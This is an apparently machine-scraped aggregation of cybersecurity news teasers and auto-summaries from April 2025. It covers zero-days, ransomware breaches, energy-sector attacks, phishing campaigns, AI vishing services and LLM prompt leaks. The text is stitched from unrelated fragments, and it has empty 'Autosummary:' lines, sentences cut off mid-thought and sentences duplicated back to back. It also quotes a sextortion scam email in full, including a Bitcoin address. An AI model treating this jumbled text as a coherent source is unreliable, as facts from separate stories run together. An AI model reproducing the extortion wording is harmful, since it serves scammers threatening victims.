It is recommended to (1) Disable AiCloud (2) disable any services that can be accessed from the internet, such as remote access from WAN, port forwarding, DDNS, VPN server, DMZ, port triggering, and FTP.” concludes the security advisory. "In this Help Net Security video, Alexis Ober, Threat Intel Analyst at Fortra, discusses the threat actor group PlugValley, which is now offering AI-powered vishing-as-a-service. Rather than requiring technical skills or large budgets, PlugValley’s service lets any cybercriminal launch vishing campaigns using customizable AI agents with human-like voices, spoofed caller IDs, and real-time call adaptation to boost success rates — all sold via Telegram subscriptions for up to $1,999/month.
The post Inside PlugValley: How this AI vishing-as-a-service group operates appeared first on Help Net Security.
"Autosummary:
"Hands-On Industrial Internet of Things is a practical guide designed specifically for professionals building and securing industrial IoT (IIoT) systems. About the authors Giacomo Veneri brings deep expertise in telecommunications and AI, shaped by over 25 years in IoT and AI applications within industrial environments. As Director of AI Specialists at Baker Hughes, he spearheads machine learning innovations that bridge cutting-edge research with practical, real-world solutions. Antonio Capasso offers extensive experience managing large-scale IT projects … More
The post Review: Hands-On Industrial Internet of Things appeared first on Help Net Security.
"Autosummary:
The authors cover essential areas like secure data flow setups, analytics, and visualizations using secure, industry-standard tools such as Azure Cosmos DB, Grafana, and Azure Synapse. "Autosummary:
"Autosummary:
"Autosummary:
"Apple has released emergency security updates for iOS/iPadOS, macOS, tvOS and visionOS that fix two zero-day vulnerabilities (CVE-2025-31200, CVE-2025-31201) that have been exploited “in an extremely sophisticated attack against specific targeted individuals on iOS.” CVE-2025-31200 and CVE-2025-31201 CVE-2025-31200 affects CoreAudio, an API Apple devices use for processing audio. The memory corruption vulnerability can be triggered with a maliciously crafted media file: when the audio stream in it is processed, it allows attackers to execute malicious … More
The post Apple plugs zero-day holes used in targeted iPhone attacks (CVE-2025-31200, CVE-2025-31201) appeared first on Help Net Security.
"Autosummary:
These latest attacks were aimed against specific individuals, which means that Apple users that are not journalists, activists/dissidents, politicians/diplomats, researchers and executives in sensitive fields, or other users that have access to valuable data or communications, are unlikely to be in grave danger. "Cyberattacks targeting the energy sector are increasing, driven by a host of geopolitical and technological factors. A report published by Sophos in July 2024, and which surveyed 275 cybersecurity and IT leaders from the energy, oil/gas, and utilities sector across 14 countries, found 67% of respondents who said their organizations had suffered a ransomware attack in the last year. While Sophos’ figure remained steady year-over-year, a January 2025 report authored by TrustWave said that ransomware … More
The post Cyber threats against energy sector surge as global tensions mount appeared first on Help Net Security.
"Autosummary:
According to EPRI’s Wikipedia page, the institute is an American “independent, nonprofit organization that conducts research and development related to the generation, delivery, and use of electricity to help address challenges in the energy industry, including reliability, efficiency, affordability, health, safety, and the environment.” Access & data brokers Other notable energy sector data leaks and access listings observed by Resecurity, and which are at heightened risk of being weaponized by ransomware actors and other threat actors, include: 30 GB of confidential data from Qatar Gas, ADNOC Offshore, and Bell Energy Office 365 Exchange Access for a U.S. energy firm that generates $6 billion in annual revenue Network remote code execution access to “the largest energy company in North Africa” The Emirates-focused data leaks were published on the XSS cybercrime forum on December 28, 2024. By citing the export control part of GE’s network, the threat actor is likely referencing servers or databases storing classified or controlled technical data, network segments linked to military contracts, or sensitive R&D. On January 28, the threat actor wrote a follow-up post to their initial thread and claimed the GE global network access credentials offer entry points to servers, network devices, firewalls, load balancers, and VPN accounts. Energy sector victims allegedly compromised by Handala include: BLEnergy – a leading battery energy storage systems (BESS) integrator and provider in Israel ELitech – a company providing engineering and project management services to renewable energy, private power plants, gas insulated substations (GIS), defense and military projects, and projects requiring a high degree of technological expertise In July 2024, Handala published a post on the RAMP cybercrime forum announcing that the hack and leak of 145 GB of data belonging to BLenergy.According to the company’s webpage, “IKAV is an international asset management group that provides institutional investors with investment solutions spanning a broad range of infrastructure energy assets, including solar, concentrated solar power, wind, energy efficiency, geothermal, thermal power plants and upstream.” In a ransom announcement that has since been removed from HellCat’s data leak site (DLS), the threat group claimed the “breach has compromised critical data, including projects, issues, and plugins, along with over 400,000 rows of user data, totaling more than 40GB Compressed Data.”PLCs targeted in this attack campaign are “commonly used in the Water and Wastewater Systems (WWS) Sector and used in other industries including, but not limited to, energy, food and beverage manufacturing, transportation systems, and healthcare,” according to CISA. In this post, the threat actor claims to have access to over 5,000 stolen PDF files related to the United Arab Emirates nuclear program, including inspection reports, security procedures, technical documents, invoices, and other documents.According to BleepingComputer, the platform “often contains sensitive data, such as source code, authentication keys, IT plans, customer information, and internal discussions related” to these software development projects.This access listing claimed to include administrative passwords for routers, switches, F5s, WASS’s, ISE, firewalls, and proxies. VPN access for a Greek nuclear energy company Electric Power Research Institute (EPRI) database GE network logins, including access to nuclear power plants DDoS attack on Framatome in France DDoS attacks on Doel and Tihange nuclear plants in Belgium The Malaysian Nuclear Agency database leak was posted on Breach Forums on December 3, 2024 by a threat actor who goes by the handle ‘Ciph3r.’[Hacktivist] Based on this compilation of leading threat actors, defenders should be especially aware of HellCat’s tactics, techniques, and procedures (TTPs), specifically their reliance on infostealer attack chains, with an emphasis on Lumma malware.This threat intelligence research is a continuation of our material published last year – “Ransomware Attacks against the Energy Sector on the rise – Nuclear and Oil & Gas are Major Targets in 2024“, highlighting threat actors targeting energy installations in North America, Asia, and the European Union, including nuclear facilities and related research entities. The threat actors claimed the attack inflicted the following cyber-physical damage: “The valves were broken, the seals were damaged by increasing the pressure, the server failed, the flow power in the group settings was increased, which will inevitably lead to wear of the equipment and strategically important parts for work.” According to the December Cyble report, Z-Pentest claimed to have disrupted “critical systems at an oil well site, including systems responsible for water pumping, petroleum gas flaring, and oil collection.” While there is no substantive link between the johnsherlock access broker persona and Midnight Blizzard, the critical nature of this type of access listing, combined with the geoeconomically sensitive nature of the victim’s industry category (energy), and the relatively high price of the listing, merit closer investigation.Two prominent pro-Russia hacktivist groups that have generated publicity for their energy-sector targeting, despite general skepticism regarding their claims, are ‘Z-Pentest’ and its partner organization, ‘Sector 16’ (S16).A 6-minute screen recording posted by the threat actor showed “detailed screenshots of the facility’s control systems, showing tank setpoints, vapor recovery metrics, and operational dashboards allegedly accessed and changed during the breach,” according to Cyble. "Symbiotic Security launched Symbiotic Security version 1 that ensures code security keeps pace with development speed, by using AI to secure code in real-time through remediation and training integrated within their workflows. Symbiotic Security v1 empowers developers to write secure code from the outset during the development process, and maximize the productivity gains of AI-assisted coding. Its intelligent detection and remediation identifies vulnerabilities in real-time, instantly providing secure code suggestions that developers can accept, modify, … More
The post Symbiotic Security v1 empowers developers to write secure code appeared first on Help Net Security.
"Autosummary:
The built-in AI chatbot builds developers’ security skills, delivering specific training on any vulnerabilities it detects, then explaining remediation strategies, and generating suggested fixes. “Making security a positive experience for developers is key to growing their cyber judgement and knowledge,” said Edouard Viot, CTO, Symbiotic Security. "Autosummary:
"The vulnerability allows an attacker with network access to an Erlang/OTP SSH server to execute arbitrary code without prior authentication," Ruhr University Bochum researchers Fabian Bäumer, Marcus Brinkmann, Marcel Maehren, and Jörg Schwenk said. "Autosummary:
Once the exclusions are set, an obfuscated PowerShell command is run to fetch and run scripts from remote URLs that are capable of gathering extensive information related to the operation system, BIOS, hardware, and installed applications. "Autosummary:
Security patches are available for the following devices: iPhone XS and later, iPad Pro 13-inch, iPad Pro 13.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later. "Autosummary:
"Autosummary:
"In the coming months, we will set out further details including plans to strengthen international cooperation, introduce better protections against AI-enabled fraud, and increase collaboration between government and the private sector," they added.A spokesperson said the fake banking app scam is "a concern" and they gave the following safety advice: Do not be pressured into accepting payment by bank transfer Never hand over goods unless you are sure you have received the money and check your own bank account to see if the payment has arrived Check if the buyer has a newly registered profile before you meet them as this may mean they are not who they say they are More information about staying safe from scams can be found here."He handed his phone over to me and I typed in my account details, clicked send, and it came up with a successful payment notification," Mr Rudd said. "CVE-2025-24054, a Windows NTLM hash disclosure vulnerability that Microsoft has issued patches for last month, has been leveraged by threat actors in campaigns targeting government and private institutions in Poland and Romania. “Active exploitation in the wild has been observed since March 19, 2025, potentially allowing attackers to leak NTLM hashes or user passwords and compromise systems,” Check Point researchers have shared. About CVE-2025-24054 CVE-2025-24054 allows attackers to capture the NTLMv2 response (i.e., the NTLMv2-SSP … More
The post Windows NTLM vulnerability exploited in multiple attack campaigns (CVE-2025-24054) appeared first on Help Net Security.
"Autosummary:
Both were patched on March 11, 2025 and both can allow an unauthorized attacker to perform spoofing over a network, but the former requires the target to open a folder that contains a specially crafted file, while the latter requires them only to interact with (e.g., select, inspect, move) the malicious file, and not necessarily to open and execute it. "Autosummary:
" The TA450 ClickFix campaign is said to target finance, government, health, education, and transportation sectors across the Middle East, with an emphasis on the United Arab Emirates (U.A.E.) and Saudi Arabia, as well as those located in Canada, Germany, Switzerland, and the United States. ClickFix, in a nutshell, refers to a sneaky technique that urges users to infect their own machine by following a series of instructions to copy, paste, and run malicious commands under the pretext of fixing an issue, completing a CAPTCHA verification, or registering their device. "Autosummary:
According to the World Health Organisation (WHO), most people recover after the first phase of infection which usually involves fever, muscle and back pain, headache, shivers, loss of appetite, and nausea or vomiting. "Autosummary:
The company has reported yearly revenues of approximately $100 billion, and in the American market, it operates under brands such as Food Lion, Stop & Shop, Giant Food, and Hannaford. "Autosummary:
PointyPhish is linked to over 3,000 domains and phishing sites, preying on urgency by claiming expiring reward points to trick customers into fraudulent sites that steal payment details Similarly, TollShark involves over 2,000 domains and phishing sites, exploiting fears of unpaid tolls to capture sensitive information from unsuspecting individuals. Two Different Campaigns, One Common Tactic PointyPhish – Sends fake SMS alerts about expiring reward points to banking, airline, and retail store customers, leading to phishing pages that steal full credit/debit card details. "Autosummary:
"Autosummary:
"Autosummary:
" The malicious archive also contains three more files, namely "xd.url," "xd.website," and "xd.link," which leverage older NTLM hash leak flaws and are most likely included for redundancy in case the "library-ms" method fails. "AI readiness in cybersecurity involves more than just possessing the latest tools and technologies; it is a strategic necessity. Many companies could encounter serious repercussions, such as increased volumes of advanced cyber threats, if they fail to exploit AI due to a lack of clear objectives, inadequate data readiness or misalignment with business priorities. Foundational concepts are vital for constructing a robust AI-readiness framework for cybersecurity. These concepts encompass the organization’s technology, data, security, governance … More
The post Strategic AI readiness for cybersecurity: From hype to reality appeared first on Help Net Security.
"Autosummary:
Action: Organizations must efficiently deploy an LLMOps pipeline integrated with AIOps to create a self-learning security ecosystem that supports continuous integration, model training and fine-tuning, model deployment and delivery, model retraining, and evaluation based on new threat intelligence.By addressing these issues, organizations can unlock AI’s potential to provide real-time threat detection, proactive response and adaptive defenses, ensuring that cybersecurity stays ahead of increasingly complex and frequent threats. Strong foundations and constant scrutiny AI readiness is about creating a holistic approach where organizations integrate data readiness, governance, ethical considerations, and collaboration into their AI strategy. "Autosummary:
" "If a break in service were to occur, we anticipate multiple impacts to CVE, including deterioration of national vulnerability databases and advisories, tool vendors, incident response operations, and all manner of critical infrastructure," Barsoum noted in a letter sent to CVE Board Members. "Autosummary:
Cyber Threats Against Energy Sector Surge as Global Tensions Mount Pierluigi Paganini April 16, 2025 April 16, 2025 Resecurity warns of rising cyberattacks on the energy sector, some linked to large-scale campaigns targeting national infrastructure for geopolitical aims. "Autosummary:
Due to the complexity of the files, the Company engaged cybersecurity data mining experts to evaluate the exfiltrated data and was recently informed of its nature, scope and validity, confirming that the data sets contained a significant number of individuals’ personal information associated with our clients’ end-users.” "Autosummary:
" The disclosure comes as Microsoft, in its latest Cyber Signals report, warned of an increase in AI-driven fraud attacks to generate believable content for attacks at scale using deepfakes, voice cloning, phishing emails, authentic-looking fake websites, and bogus job listings. "Autosummary:
In the next step, the controller directs the compromised machine to perform one of the below actions based on the password provided and the command-line options used - Open a reverse shell Redirect new connections to a shell on a specific port, or Confirm the backdoor is active It"s worth pointing out that the password sent by the controller must match one of the hard-coded values in the BPFDoor sample. "Autosummary:
To protect yourself from such attacks, our virus analysts recommend installing Dr.Web Security Space antivirus for mobile devices, shunning smartphones with features that clearly do not match their price, downloading applications only from trusted sources, such as Google Play, RuStore and AppGallery, and not storing on their devices screenshots with mnemonic phrases, passwords, and keys in unencrypted form.” In June 2014 security experts at G Data discovered that a popular Chinese Android Smartphone, Star N9500 was commercialized with a pre-installed spyware, meanwhile in April, the Chinese TV station, CCTV, reported some cases of smartphones compromised by pre-installed malware before selling them on to unwitting customers. "Autosummary:
"Autosummary:
"Autosummary:
My Bitcoin address (BTC wallet): 1FJg6nuRLLv4iQLNFPTpGwZfKjHJQnmwFs After payment is received, I will delete the video and you will not hear from me again I’m giving you 48 hours to pay Do not forget that I will see you when you open the message, the counter will start If I see you’ve shared this message with someone else, the video will be posted immediately” If the victim decides to search for “njrat” they’ll find that it’s a remote access trojan (RAT) has capabilities to log keystrokes, access the victim’s camera, steal credentials stored in browsers, upload/download files, view the victim’s desktop, and more. The text of the email roughly looks like this: “As you may have noticed, I sent you an email from your email account This means I have full access to your account I’ve been watching you for a few months The thing is, you got infected with a njrat through an adult site you visited If you don’t know about this, let me explain The njrat gives me full access and control over your device. "Autosummary:
"Autosummary:
CISA’s 11-Month extension ensures continuity of MITRE’s CVE Program Pierluigi Paganini April 16, 2025 April 16, 2025 MITRE’s U.S.-funded CVE program, a core cybersecurity tool for tracking vulnerabilities, faces funding expiry Wednesday, risking disruption to global security. "Autosummary:
"In this Help Net Security interview, Sandy Kronenberg, CEO of Netarx, discusses how cybercriminal groups are adopting corporate structures and employee incentives to scale operations, retain talent, and evade detection. He covers the strategic collaborations behind major attacks, business-like parallels, and the implications of these shifts as these groups grow more sophisticated. What motivates cybercriminal groups to adopt mainstream corporate structures and employee incentives, and what impact does this have on recruitment and retention? Loose, … More
The post Cybercriminal groups embrace corporate structures to scale, sustain operations appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Sandy Kronenberg, CEO of Netarx, discusses how cybercriminal groups are adopting corporate structures and employee incentives to scale operations, retain talent, and evade detection.Furthermore, it is reported that their team is given access to tools, training, vacation and sick-time, and health benefits, similar to employees at traditional corporations.These groups often start with an ideology that is politically motivated, but after some success, members often want financial gain, causing fractures, schisms, or name changes. "In this Help Net Security video, Jennifer Chen, Executive Director of the Association of Corporate Counsel (ACC) Foundation, discusses how globally, Chief Legal Officers (CLOs) are becoming integral leaders in cybersecurity strategy, holding leadership positions, and frequently reporting cybersecurity strategies to the company board. According to the ACC Foundation, the findings highlight a significant shift in how cybersecurity is viewed through a legal and governance lens. Key findings include: Half of CLOs (50%) are part … More
The post Chief Legal Officers step up in cybersecurity oversight appeared first on Help Net Security.
"Autosummary:
"CISO Department of Justice | Australia | On-site – View job details As a CISO, you will be responsible for developing and implementing a cyber security strategy as well as establishing and maintaining the organisation’s strategic enterprise-wide information and cyber security management program. Cloud Security Architect Kinaxis | Canada | Remote – View job details As a Cloud Security Architect, you will design secure patterns for workloads deployed on Infrastructure-as-a-Service, Platform-as- a-Service and Software-as-a-Service environments, … More
The post Cybersecurity jobs available right now: April 15, 2025 appeared first on Help Net Security.
"Autosummary:
VP, Security Clio | Canada | Hybrid – View job details As a VP, Security, you will design, implement, and mature an enterprise-level risk management framework, including supporting policies, procedures, and standards. Senior Consultant Cyber Cloud Security Deloitte | Germany | On-site – View job details As a Senior Consultant Cyber Cloud Security, you will design cloud architectures, solutions, and processes for secure landing zones, cloud authentication, cloud security incident and risk management, et al. Cloud Security Architect Kinaxis | Canada | Remote – View job details As a Cloud Security Architect, you will design secure patterns for workloads deployed on Infrastructure-as-a-Service, Platform-as- a-Service and Software-as-a-Service environments, as well as hybrid architecture patterns, which may tightly integrate to other public clouds or on-premises systems. Cyber Security Engineer Berkeley Lab | USA | On-site – View job details As a Cyber Security Engineer, you will perform security duties including monitoring for potential threats, proactively examining network traffic and log data, investigating anomalous activity, forensic analysis, and resolution of security incidents. "Autosummary:
"Seemplicity announced a major product release. This latest version of the Seemplicity Platform introduces powerful new AI-driven capabilities designed to streamline and scale remediation operations. Two major new features – called “Find the Fixer” and “Automatic Scoping” – reduce remediation chaos by eliminating manual bottlenecks and significantly accelerate the path from detection to resolution. Security teams face inadequate prioritization, misrouted remediation requests, and manual workflows that slow down progress. Legacy exposure management requires constant upkeep … More
The post Seemplicity adds AI-driven capabilities to scale remediation operations appeared first on Help Net Security.
"Autosummary:
Key benefits include: AI-powered tag discovery from incomplete or inconsistent data Dynamic grouping aligned to real business context Faster prioritization and routing of exposures Scalable segmentation that evolves with the organization Scalable, intelligent exposure management Together, these capabilities provide a scalable, intelligent approach to remediation ensuring vulnerabilities and exposures don’t just get detected, but resolved. "Autosummary:
Hertz disclosed a data breach following 2024 Cleo zero-day attack Pierluigi Paganini April 15, 2025 April 15, 2025 Hertz Corporation disclosed a data breach after customer data was stolen via Cleo zero-day exploits in late 2024, affecting Hertz, Thrifty, and Dollar brands. "Autosummary:
Gladinet flaw CVE-2025-30406 actively exploited in the wild Pierluigi Paganini April 15, 2025 April 15, 2025 Huntress reports active exploitation of Gladinet CVE-2025-30406 in the wild, affecting seven organizations and 120 endpoints. “We don’t have any intentions of sharing the proof-of-concept to embolden other adversaries, but once an external exploit is shared publicly we will update this blog to include the technical details of recreating the attack script.” continues the report. "Autosummary:
This includes system metadata, installed applications, directory listing, and the top-level contents of the victim"s home directory, iCloud Keychain, stored SSH keys, and configuration files for AWS, Kubernetes, and Google Cloud. "Autosummary:
Luke Nolan, a senior research associate at CoinShares, an asset management company specialising in digital assets, said the hack of Powell"s account was an example of "pump and dump". "Autosummary:
The type of stolen data varies per customer, but could include: Name Contact information Driver’s license Social Security Number (in rare cases according to Hertz) “A very small number of individuals may have had their Social Security or other government identification numbers, passport information, Medicare or Medicaid ID (associated with workers’ compensation claims), or injury-related information associated with vehicle accident claims impacted by the event.”The Hertz Corporation, on behalf of Hertz, Dollar, and Thrifty brands, is sending breach notifications to customers who may have had their name, contact information, driver’s license, and—in rare cases—Social Security Number exposed in a data breach. In 2024, CL0P repeated this method using a zero-day exploit against Cleo, a business-to-business (B2B) tech platform provider that specializes in managed file transfer (MFT) solutions, like Cleo Harmony, VLTrader, and LexiCom. "Autosummary:
RansomHouse has made a name for itself by attacking organisations in education, government, manufacturing, and healthcare, including the likes of AMD, the University of Paris-Saclay, Bulgaria’s Supreme Administrative Court, and South African telecoms operator Cell C. And do these organisations pay up? Image In the example above, RansomHouse has linked to "evidence packs" and even a "full data dump" belonging to one of their victims, meaning that anyone can download the stolen data - without even requiring a password. "American car rental company Hertz has suffered a data breach linked to last year’s exploitation of Cleo zero-day vulnerabilities by a ransomware gang. The breach resulted in information of an unknown number of customers of Hertz and Hertz’s subsidiaries Dollar and Thrifty to be compromised. Hertz data breach notifications “Cleo is a vendor that provides a file transfer platform used by Hertz for limited purposes,” the company shared – though it did not specify what … More
The post Hertz data breach: Customers in US, EU, UK, Australia and Canada affected appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The attacks, the Taiwanese cybersecurity company said, targeted a multitude of sectors spanning nearly 20 different countries such as Austria, Australia, France, Spain, Japan, South Korea, Netherlands, Singapore, Taiwan, the United Arab Emirates, the United Kingdom, and the United States. "Autosummary:
"Autosummary:
"Autosummary:
A pour of malware The phishing campaign started in January 2025 and begins with an email spoofing a Ministry of Foreign Affairs, sent from "bakenhof[.]com" or "silry[.]com," inviting the recipient to a wine-tasting event. "Autosummary:
"As AI becomes embedded in daily business workflows, the risk of data exposure increases. Prompt leaks are not rare exceptions. They are a natural outcome of how employees use large language models. CISOs cannot treat this as a secondary concern. To reduce risk, security leaders should focus on policy, visibility, and culture. Set clear rules about what data can and cannot be entered into AI systems. Monitor usage to identify shadow AI before it becomes … More
The post The quiet data breach hiding in AI workflows appeared first on Help Net Security.
"Autosummary:
Understanding prompt leaks Prompt leaks happen when sensitive data, such as proprietary information, personal records, or internal communications, is unintentionally exposed through interactions with LLMs. Mitigation strategies “The way to avoid leaks is not to avoid training LLMs on company data, but rather making sure that only people with appropriate access and sufficient levels of trust can use such LLMs within the organization,” said Or Eshed, CEO of LayerX. Eshed recommended a tiered approach for enterprises looking to tighten AI security. These kinds of exposures carry real risks: Regulatory fallout: If personally identifiable information (PII) or protected health information (PHI) is exposed through prompts, it could trigger violations under GDPR, HIPAA, or other data protection laws. If personally identifiable information (PII) or protected health information (PHI) is exposed through prompts, it could trigger violations under GDPR, HIPAA, or other data protection laws.Researchers found that many inputs posed some level of data leakage risk, including personal identifiers, financial data, and business-sensitive information. "Data breaches are rising across industries, hitting healthcare, finance, and retail especially hard. The damage goes beyond lost data, as it’s financial, operational, and reputational.
The post Sector by sector: How data breaches are wrecking bottom lines appeared first on Help Net Security.
"Autosummary:
The action plan proposes, among others, for ENISA, the EU agency for cybersecurity, to establish a pan-European Cybersecurity Support Centre for hospitals and healthcare providers, providing them with tailored guidance, tools, services, and training. Factors contributing to rising costs Several factors are driving up the costs associated with data breaches: Business disruption: Breaches often lead to significant operational downtime, resulting in lost revenue and decreased productivity. Strategies to mitigate data breach costs To reduce the financial impact of data breaches, organizations should: 1.As recent events have shown, this harm extends beyond a loss in patient volume to include financial repercussions, such as downgrades in bond ratings,” Aaron Weismann, CISO at Main Line Health explained. "Autosummary:
"Autosummary:
In an attempt to verify its claim of having hacked NASCAR, Medusa has published screenshots of what it claims are internal documents - including some purporting to show the names, email addresses, and phone numbers of NASCAR employees and sponsors, as well as invoices, financial reports, and more. "Autosummary:
The Phishing-as-a-Service platform uses anti-debugging scripts to block dev tools, detect automation, prevent right-click, and spot paused execution. "Autosummary:
Compromised data includes full names, contact details, ID numbers, banking information, driver’s license numbers, medical records and passport details.South African telecom provider Cell C disclosed a data breach following a cyberattack Pierluigi Paganini April 14, 2025 April 14, 2025 Cell C, one of the biggest telecom providers in South Africa confirms a data breach following a 2024 cyberattack. "Autosummary:
This week"s list includes — CVE-2025-3102 (OttoKit plugin), CVE-2025-23359 (NVIDIA Container Toolkit), CVE-2025-30406 (Gladinet CentreStack), CVE-2025-29824 (Windows Common Log File System), CVE-2024-48887 (Fortinet FortiSwitch), CVE-2024-53150, CVE-2024-53197 (Google Android), CVE-2025-2945 (pgAdmin), CVE-2025-2244 (Bitdefender GravityZone), CVE-2025-31334 (WinRAR), CVE-2025-30401 (WhatsApp for Windows), CVE-2025-23120 (Rockwell Automation Industrial Data Center), CVE-2025-25211, CVE-2025-26689 (Inaba Denki Sangyo CHOCO TEI WATCHER), CVE-2024-4872, CVE-2024-3980 (Hitachi Energy MicroSCADA Pro/X SYS600), CVE-2025-2636 (InstaWP Connect – 1-click WP Staging & Migration plugin), CVE-2025-3439 (Everest Forms – Contact Form, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin), and CVE-2025-31565 (WPSmartContracts plugin). — An analysis of Perplexity AI"s Android app has uncovered a set of 11 flaws, including hard-coded API keys, cross-origin resource sharing (CORS) misconfigurations, lack of SSL pinning, unsecured network configuration, tapjacking, and susceptibility to known flaws like Janus and StrandHogg, exposing users of the app to risks such as data theft, account takeovers, and reverse engineering attacks.Flaws Uncovered in Perplexity"s Android App — An analysis of Perplexity AI"s Android app has uncovered a set of 11 flaws, including hard-coded API keys, cross-origin resource sharing (CORS) misconfigurations, lack of SSL pinning, unsecured network configuration, tapjacking, and susceptibility to known flaws like Janus and StrandHogg, exposing users of the app to risks such as data theft, account takeovers, and reverse engineering attacks.According to PRODAFT, Medialand has been linked to Yalishanda (LARVA-34), with the service playing a key role in enabling a wide range of cybercriminal operations, including hosting ransomware infrastructure for Black Basta, malware C2 servers, code-signing systems, phishing kits, data exfiltration panels, data leak sites.According to PRODAFT, Medialand has been linked to Yalishanda (LARVA-34), with the service playing a key role in enabling a wide range of cybercriminal operations, including hosting ransomware infrastructure for Black Basta, malware C2 servers, code-signing systems, phishing kits, data exfiltration panels, data leak sites.The surge in attacks began on March 31, 2025, with over 6,600 unique IP addresses, mainly from Taiwan, Japan, and South Korea, targeting systems located in the United States, United Kingdom, and Germany, attempting to exploit the flaw over the past 30 days.The surge in attacks began on March 31, 2025, with over 6,600 unique IP addresses, mainly from Taiwan, Japan, and South Korea, targeting systems located in the United States, United Kingdom, and Germany, attempting to exploit the flaw over the past 30 days.AWS Debuts Support for ML-KEM in KMS, ACM, and Secrets Manager — Amazon Web Services (AWS) has announced support for Module-Lattice-Based Key-Encapsulation Mechanism (ML-KEM) for hybrid post-quantum key agreement in Key Management Service (AWS KMS), Certificate Manager (ACM), and Secrets Manager. — Amazon Web Services (AWS) has announced support for Module-Lattice-Based Key-Encapsulation Mechanism (ML-KEM) for hybrid post-quantum key agreement in Key Management Service (AWS KMS), Certificate Manager (ACM), and Secrets Manager.The Black Basta chat dataset shed light on the group"s "internal workflows, decision-making processes, and team dynamics, offering an unfiltered perspective on how one of the most active ransomware groups operates behind the scenes," Trustwave said.The Black Basta chat dataset shed light on the group"s "internal workflows, decision-making processes, and team dynamics, offering an unfiltered perspective on how one of the most active ransomware groups operates behind the scenes," Trustwave said.Leaked internal data reveals a treasure trove of information about who bought servers, who paid (including via cryptocurrency), and possibly personally identifiable information (PII), not to mention allow defenders to correlate indicators of compromise (IoCs) and improve attribution efforts.Leaked internal data reveals a treasure trove of information about who bought servers, who paid (including via cryptocurrency), and possibly personally identifiable information (PII), not to mention allow defenders to correlate indicators of compromise (IoCs) and improve attribution efforts. — Chinese officials have acknowledged in a secret meeting in December 2024 that it was behind a series of cyber attacks aimed at U.S. critical infrastructure, a cluster of activity that"s known as Volt Typhoon, the Wall Street Journal reported, citing, people familiar with the matter. "Autosummary:
The event will take place June 16-21, 2025, in Washington, D.C., bringing together top cybersecurity professionals for hands-on training, live labs, and expert-led discussions. "Autosummary:
At the same time, it also adds itself to filesystem locations like "Startup," "Program Files," and "LocalAppData." Registry-based persistence Source: Morphisec ResolverRAT attempts to connect at scheduled callbacks at random intervals to evade detection based on irregular beaconing patterns. "Autosummary:
"On April 12, 2025, DaVita Inc. became aware of a ransomware incident that has encrypted certain elements of our network," reads the 8-K filing. "Autosummary:
This includes Hindi, Italian, Czech, Turkish, Portuguese, and Indonesian, indicating the threat actor"s attempts to cast a wide net through region-specific targeting and maximize infection rates. "Autosummary:
Unlike "spray-and-pray" credential harvesting campaigns that typically involve the bulk distribution of spam emails to obtain victims" login information in an indiscriminate fashion, the latest attack tactic takes spear-phishing to the next level by only engaging with email addresses that attackers have verified as active, legitimate, and high-value. "Autosummary:
"Autosummary:
"As a threat intelligence company, we specialize in obtaining visibility into the infrastructures of cybercriminals, searching for patterns, tactics, techniques, and procedures that help us understand adversarial networks and detect and mitigate potential cyberattacks," explains Prodaft. "Autosummary:
New malware ‘ResolverRAT’ targets healthcare, pharmaceutical firms Pierluigi Paganini April 14, 2025 April 14, 2025 New malware ‘ResolverRAT’ is targeting healthcare and pharmaceutical firms, using advanced capabilities to steal sensitive data. "Autosummary:
" The company says that the data varies per individual but could contain customers" names, contact information, date of birth, credit card information, driver"s license information, and information related to workers" compensation claims. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft fixes actively exploited Windows CLFS zero-day (CVE-2025-29824) April 2025 Patch Tuesday is here, and Microsoft has delivered fixes for 120+ vulnerabilities, including a zero-day (CVE-2025-29824) that’s under active attack. WinRAR MotW bypass flaw fixed, update ASAP (CVE-2025-31334) WinRAR users, upgrade your software as soon as possible: a vulnerability (CVE-2025-31334) that could allow attackers to bypass Windows’ Mark of the … More
The post Week in review: Microsoft patches exploited Windows CLFS 0-day, WinRAR MotW bypass flaw fixed appeared first on Help Net Security.
"Autosummary:
Why security culture is crypto’s strongest asset In this Help Net Security interview, Norah Beers, CISO at Grayscale, discusses key security challenges in managing crypto assets, adversary tactics, private key management, and securing both hot and cold wallets. New infosec products of the week: April 11, 2025 Here’s a look at the most interesting products from the past week, featuring releases from Forescout, Index Engines, Jit, RunSafe Security, and Seal Security. Transforming cybersecurity into a strategic business enabler In this Help Net Security interview, Kevin Serafin, CISO at Ecolab, discusses aligning security strategy with long-term business goals, building strong partnerships across the organization, and approaching third-party risk with agility. "Autosummary:
In the most recent campaign, the group targeted organizations in the communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education sectors. "Autosummary:
"Autosummary:
"Autosummary:
“The SureTriggers: All-in-One Automation Platform plugin for WordPress is vulnerable to an authentication bypass leading to administrative account creation due to a missing empty value check on the ‘secret_key’ value in the ‘autheticate_user’ function in all versions up to, and including, 1.0.78.” reads the advisory. "Autosummary:
SVG lures surging In a separate but related report, Trustwave says it has identified a dramatic increase in phishing attacks using malicious SVG (Scalable Vector Graphics) files, driven by PhaaS platforms like Tycoon2FA, Mamba2FA, and Sneaky2FA. "Autosummary:
Getty Images The national airline, Aerolíneas Argentinas, said it had scrapped 258 flights, affecting around 20,000 passengers Since then, the president has introduced tough austerity measures to tackle hyperinflation. "Ransomware attacks increased by nearly 20% in 2024, and the severity rose by 13%, according to At-Bay. The blast radius of ransomware continues to grow as businesses impacted by attacks on vendors and partners increased 43%, while the average cost of these third-party incidents jumped by 72%. “Remote access tools like VPNs and RDP continue to attract a high level of attention from cybercriminals. In 2024, they were correlated with 80% of ransomware attacks, up … More
The post Ransomware groups push negotiations to new levels of uncertainty appeared first on Help Net Security.
"Autosummary:
In 2024, they were correlated with 80% of ransomware attacks, up from 63% the year prior,” said Adam Tyra, CISO for Customers at At-Bay. "2024 brought about countless new cybersecurity challenges including significant growth of the mobile threat landscape, according to Lookout. Threat actors, ranging from nation-states to individuals, are increasingly targeting mobile devices for the onset of their attacks to steal credentials and infiltrate the enterprise cloud in a pathway known as the modern kill chain. More than ever, organizations of every size across every industry must view mobile targeting as a canary in the coal mine – … More
The post iOS devices face twice the phishing attacks of Android appeared first on Help Net Security.
"Autosummary:
